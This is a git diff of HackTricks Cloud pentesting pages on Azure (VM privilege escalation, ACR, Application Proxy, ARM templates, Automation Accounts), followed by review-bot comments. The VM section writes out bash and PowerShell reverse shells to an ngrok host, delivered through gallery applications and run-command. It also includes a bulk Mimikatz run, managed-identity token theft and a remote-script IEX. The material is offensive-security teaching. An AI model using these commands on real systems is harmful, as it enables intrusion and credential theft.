"https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name \ + --app-version-ids 
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ + --treat-deployment-as-failure true +``` +{% endtab %} + +{% tab title="Windows" %} +{% code overflow="wrap" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --resource-group \ + --os-type Windows \ + --location "West US 2" + +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export encodedCommand="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" +az sig gallery-application version create \ + --version-name 1.0.0 \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "powershell.exe -EncodedCommand $encodedCommand" \ + --remove-command "powershell.exe -EncodedCommand $encodedCommand" \ + --update-command 
"powershell.exe -EncodedCommand $encodedCommand" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name deleteme-win4 \ + --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ + --treat-deployment-as-failure true +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +### `Microsoft.Compute/virtualMachines/runCommand/action` + +This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:** + +{% tabs %} +{% tab title="Linux" %} +```bash +# Execute rev shell +az vm run-command invoke \ + --resource-group \ + --name \ + --command-id RunShellScript \ + --scripts @revshell.sh + +# revshell.sh file content +echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh +``` +{% endtab %} + +{% tab title="Windows" %} +```bash +# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action +# Execute a rev shell +az vm run-command invoke \ + --resource-group Research \ + --name juastavm \ + --command-id RunPowerShellScript \ + --scripts @revshell.ps1 + +## Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +## Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export 
encodedCommand="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" + +# The content of +echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1 + + +# Try to run in every machine +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` +{% endtab %} +{% endtabs %} + +### `Microsoft.Compute/virtualMachines/login/action` + +This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM). + +Login via **SSH** with **`az ssh vm --name --resource-group `** and via **RDP** with your **regular Azure credentials**. + +### `Microsoft.Compute/virtualMachines/loginAsAdmin/action` + +This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM). + +Login via **SSH** with **`az ssh vm --name --resource-group `** and via **RDP** with your **regular Azure credentials**. + +## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it. + +Depending on the situation more or less permissions might be needed to abuse this technique. 
+ +{% code overflow="wrap" %} +```bash +az vm create \ + --resource-group Resource_Group_1 \ + --name cli_vm \ + --image Ubuntu2204 \ + --admin-username azureuser \ + --generate-ssh-keys \ + --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \ + --nsg-rule ssh \ + --location "centralus" +# By default pub key from ~/.ssh is used (if none, it's generated there) +``` +{% endcode %} + +### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\ +Then, from the metadata service it's possible to generate tokens for each one. + +{% code overflow="wrap" %} +```bash +# Get currently assigned managed identities to the VM +az vm identity show \ + --resource-group \ + --name + +# Assign several managed identities to a VM +az vm identity assign \ + --resource-group \ + --name \ + --identities \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 +``` +{% endcode %} + +Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. 
Check **more info in**: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} + +### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action + +According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs... + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
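Review bot: The `Microsoft.Compute/virtualMachines/loginAsAdmin/action` section is a verbatim copy of the `login/action` section above it; it should state that this permission signs the user in with administrator rights (root/sudo on Linux, local Administrator on Windows) rather than as a regular user, otherwise the two sections are indistinguishable. Other fixes in this hunk: "Execute a revers shell" should be "reverse"; the Linux "script located on the internet" example has a stray `>` in `--resource-group rsc-group>`; the "Reset password using the VMAccess extension" PowerShell block inside the Windows tab is repeated verbatim in the `VMAccess extension` expandable just below it, so keep one; the Windows `runCommand` tab mixes PowerShell (`Import-module MicroBurst.psm1`, `Invoke-AzureRmVMBulkCMD`) into a ```bash fence, and both `runCommand` tabs invoke `--scripts @revshell.sh` / `@revshell.ps1` before the line that creates the file, so reorder them; the long heading for the VM-creation section puts two permissions in one code span (`Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`). The gallery-application examples hard-code a subscription ID (`9291ff6e-...`), ngrok hostnames and a blob SAS URL with an embedded `sig=` and a 2024-12-04 expiry; all of these should be placeholders so readers do not copy environment-specific values and no signed URL is published in the docs.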
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md new file mode 100644 index 0000000000..d2f2876e27 --- /dev/null +++ b/pentesting-cloud/azure-security/az-services/README.md @@ -0,0 +1,99 @@ +# Az - Services + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Portals + +You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) + +### Raw requests + +#### Azure API via Powershell + +Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. + +Then query the Azure REST API to get the **subscription ID** and more . + +```powershell +$Token = 'eyJ0eX..' +$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' +# $URI = 'https://graph.microsoft.com/v1.0/applications' +$RequestParams = @{ + Method = 'GET' + Uri = $URI + Headers = @{ + 'Authorization' = "Bearer $Token" + } +} +(Invoke-RestMethod @RequestParams).value + +# List resources and check for runCommand privileges +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: + logging.info('Python HTTP trigger function processed a request.') + IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] + IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] + cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) + val = os.popen(cmd).read() + return func.HttpResponse(val, status_code=200) +``` + +## List of Services + +**The pages of this section are ordered by Azure service. 
In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
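Review bot: The `cmd` string in the Python function uses `apiversion=2017-09-01`, but the identity endpoint requires the `api-version` query parameter (the PowerShell `system('curl ...')` line above it has it right), so the request fails as written; fix the parameter name. The PowerShell block in "Azure API via Powershell" also runs straight into the Python function (`.../virtualMachines/ func.HttpResponse:`): everything between the `$URI = ...virtualMachines/` placeholder and the Python `def main(...)` line is missing, most likely because an angle-bracket placeholder such as `<vm-name>` and the `->` return annotation were swallowed as HTML; the placeholder needs backticks and the Python fence opening needs to be restored. The hard-coded subscription ID `b413826f-...` should be a placeholder, and "to get the subscription ID and more ." has a stray space before the period.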
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md new file mode 100644 index 0000000000..e3c5bf95c9 --- /dev/null +++ b/pentesting-cloud/azure-security/az-services/az-acr.md @@ -0,0 +1,76 @@ +# Az - ACR + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. + +### Enumerate + +To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): + +{% code overflow="wrap" %} +```bash +# List Docker images inside the registry +IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") + +Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 + +Get-AzACR -username -password -registry .azurecr.io +``` +{% endcode %} + +{% tabs %} +{% tab title="az cli" %} +```bash +az acr list --output table +az acr show --name MyRegistry --resource-group MyResourceGroup +``` +{% endtab %} + +{% tab title="Az Powershell" %} +```powershell +# List all ACRs in your subscription +Get-AzContainerRegistry + +# Get a specific ACR +Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" +``` +{% endtab %} +{% endtabs %} + +Login & Pull from the registry + +```bash +docker login .azurecr.io --username --password +docker pull .azurecr.io/: +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md new file mode 100644 index 0000000000..8b5f6c1c07 --- /dev/null +++ b/pentesting-cloud/azure-security/az-services/az-application-proxy.md @@ -0,0 +1,66 @@ +# Az - Application Proxy + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) + +Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. + +It works like this: + +
+ +1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. +2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. +3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. +4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. +5. The connector sends the request to the **on-premises application**. +6. The **response** is sent through the connector and Application Proxy service **to the user**. + +## Enumeration + +```powershell +# Enumerate applications with application proxy configured +Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} + +# Get applications service principal +Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} + +# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app +# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it +Get-ApplicationProxyAssignedUsersAndGroups -ObjectId +``` + +## References + +* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md new file mode 100644 index 0000000000..b594c6aa78 --- /dev/null +++ b/pentesting-cloud/azure-security/az-services/az-arm-templates.md @@ -0,0 +1,57 @@ +# Az - ARM Templates / Deployments + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. + +### History + +If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. + +## Search Sensitive Info + +Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. + +```powershell +Get-AzResourceGroup +Get-AzResourceGroupDeployment -ResourceGroupName + +# Export +Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName +cat .json # search for hardcoded password +cat | Select-String password +``` + +## References + +* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/pentesting-cloud/azure-security/az-services/az-automation-account/README.md new file mode 100644 index 0000000000..8f27979031 --- /dev/null +++ b/pentesting-cloud/azure-security/az-services/az-automation-account/README.md @@ -0,0 +1,212 @@ +# Az - Automation Account + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features. + +These are like "**scheduled tasks**" in Azure that will let you execute things (actions or even scripts) to **manage**, check and configure the **Azure environment**. + +### Run As Account + +When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\ +Microsoft recommends using a **Managed Identity** for Automation Account. + +{% hint style="warning" %} +This will be **removed on September 30, 2023 and changed for Managed Identities.** +{% endhint %} + +## Runbooks & Jobs + +**Runbooks** allow you to **execute arbitrary PowerShell** code. This could be **abused by an attacker** to steal the permissions of the **attached principal** (if any).\ +In the **code** of **Runbooks** you could also find **sensitive info** (such as creds). + +If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**). + +Go to `Automation Accounts` --> `
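Review bot: In `az-acr.md`, the `Get-AzACR.ps1` block under "### Enumerate" is PowerShell (`IEX`, `Set-ItemProperty`, `Get-AzACR`) but is fenced as ```bash; tag it ```powershell so it renders with the right highlighting and is not mistaken for a shell snippet. The parameter values in `Get-AzACR -username -password -registry .azurecr.io` and in `docker login .azurecr.io --username --password` / `docker pull .azurecr.io/:` come through empty, which looks like angle-bracket placeholders being swallowed by the renderer; escape them (`\<username\>`) or spell them out as `REGISTRY_NAME.azurecr.io` and `IMAGE:TAG`. The line `Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2` is unexplained: it writes to HKLM (so it needs an elevated shell) and is a persistent machine-wide change rather than part of the enumeration, so a comment saying why the script needs it belongs next to it. Lastly, "Login & Pull from the registry" is a bare sentence where the rest of the file uses `###` headings.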
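Review bot: In `az-application-proxy.md`, the enumeration one-liner `Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}` has an empty `catch{}` that swallows every error, so a missing module, an expired token or an authorization failure is indistinguishable from "no proxy configured"; at minimum emit the unexpected errors with `Write-Warning` instead of discarding them. Two smaller points: these cmdlets come from the `AzureAD` module, which is deprecated in favour of Microsoft Graph PowerShell, so the section needs a note to that effect or Graph equivalents; and `Get-ApplicationProxyAssignedUsersAndGroups -ObjectId` is missing its argument, consistent with a swallowed `<ObjectId>` placeholder. The "## References" entry repeats the link already given under "## Basic Information" but with the older `/azure/active-directory/app-proxy/` path while the body links `/entra/identity/app-proxy/`; keep one of them.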
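Review bot: In `az-arm-templates.md` the only "## References" entry is a GitBook editor URL (`https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/~/changes/argKsv1NUBY9l4Pd28TU/...`) whose link target is the page's own `az-arm-templates.md#references`, i.e. a self-reference that resolves to nothing useful for readers; replace it with the source the page actually quotes, `https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview`. In the PowerShell block the parameter values are missing (`Get-AzResourceGroupDeployment -ResourceGroupName`, `Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName`, `cat .json`), again consistent with swallowed `<...>` placeholders. The "### History" sentence beginning "If you can access it" never says what "it" is; write "the deployment history". The defensive point is only implied: add one line stating that sensitive parameters must be declared as `securestring` precisely because plain `string` values are kept in clear text in the deployment history, which is the exposure the section describes.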
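Review bot: In `az-automation-account/README.md` the warning hint "This will be **removed on September 30, 2023 and changed for Managed Identities.**" is written in the future tense around a fixed date, so it reads as stale once that date has passed; state it as a retirement ("Run As accounts were retired on September 30, 2023 in favour of Managed Identities") and change "changed for" to "replaced by". The "## Runbooks & Jobs" paragraph says job output can contain sensitive info but gives no remediation; the matching guidance, that runbooks must not write credentials to job output and that such output should be reviewed as part of access reviews, keeps the section from reading as a one-sided attack tip. Note that this hunk is truncated in the diff view at "Go to `Automation Accounts` --> `", so the rest of the file could not be reviewed here.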